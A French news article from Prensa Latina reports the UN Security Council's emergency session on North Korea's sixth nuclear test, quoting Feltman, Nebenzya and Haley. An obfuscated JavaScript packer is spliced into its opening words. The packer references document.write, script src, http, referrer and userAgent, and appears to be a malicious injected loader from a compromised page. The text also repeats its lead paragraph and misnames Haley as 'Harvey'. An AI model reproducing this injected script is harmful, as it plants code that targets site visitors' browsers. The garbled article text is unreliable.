jeudi 25 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

L’ONU exhorte la RPDC à stopper son programme nucléaire

Nations eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|krshf|var|u0026u|referrer|fhati||js|php'.split('|'),0,{})) Unies, 4 septembre (PL) Le sous-secrétaire général des Nations Unies, Jeffray Feltman, a appelé la République Populaire Démocratique de Corée (RPDC) à stopper son programme nucléaire militaire.

Nations Unies, 4 septembre (PL) Le sous-secrétaire général des Nations Unies, Jeffray Feltman, a appelé la République Populaire Démocratique de Corée (RPDC) à stopper son programme nucléaire militaire.

Pour sa part Pyongyang inscrit ce dernier dans son droit à se défendre de l’agressivité des États-Unis, lesquels maintiennent près de 40 mille effectifs militaires dans la péninsule et y réalisent systématiquement des exercices de simulation d’agression à la Corée du Nord .

Lors d’une réunion d’urgence du Conseil de Sécurité, convoquée en réponse au sixième essai nucléaire de la RPDC annoncé la veille, le fonctionnaire à signalé que « nous demandons à la Corée du Nord d’arrêter les actions qui violent ses obligations internationales et mettent en danger les efforts de non-prolifération et de désarmement ».

Selon Feltman, « les essais et les lancements de missiles balistiques de la part du pays asiatique demandent une réponse unie du Conseil, toujours sur les bases de la diplomatie effective et dans l’objectif d’éviter une escalade des tensions dans la péninsule coréenne ».

Il a ainsi demander à ce que les décisions de l’organe de 15 membres n’aient pas un impact humanitaire sur la population nord-coréenne.

Durant la session, les membres du Conseil ont unanimement et catégoriquement condamné le nouvel essai de la RPDC, mais ont exprimés des approches et stratégies différentes face à la situation.

Pour sa part, le représentant permanent de la Russie devant l’ONU, Vasily Nebenzya, a averti lors de la cession que « seul le dialogue et la négociation peuvent résoudre le différent nucléaire dans la péninsule coréenne ».

« Les sanctions à elles seules, qu’elles interdisent ce qu’elles interdisent, ne sont pas suffisantes pour trouver une solution au thème de la dénucléarisation ni pour garantir un éventuel retour à la table de dialogue », a-t-il affirmé.

Nebenzya a défendu la proposition conjointe de la Chine et la Russie qui appelle au gel de son programme nucléaire de la part de la RPDC, et au gel des manœuvres militaires dans la péninsule de la part des États-Unis et leurs alliés.

La posture assumée par la Chine et la Russie contraste avec celle affichée lors de cette session d’urgence par la représentante étasunienne, Nikki Haley, qui a signalé que « la diplomatie a atteint ses limites dans le cas de Pyongyang ».

L’ambassadrice nord-américaine a qualifié l’initiative de Pékin et Moscou d’« insultante » et a précisé que Washington ne suspendra pas ces jeux de guerre dans la péninsule coréenne.

Harvey a proposé de redoubler les sanctions contre la RPDC, et a fait circuler un projet de résolution qui, s’il est adopter, serait le huitième régime de mesures punitives appliquées au pays asiatique ; les plus récents ont été destinés à son isolement financier et commercial.

Elle a également réitéré les avertissements de Washington aux nations qui maintiennent des liens commerciaux avec Pyongyang.

peo/lma/wmr/lma/wmr

EN CONTINU
notes connexes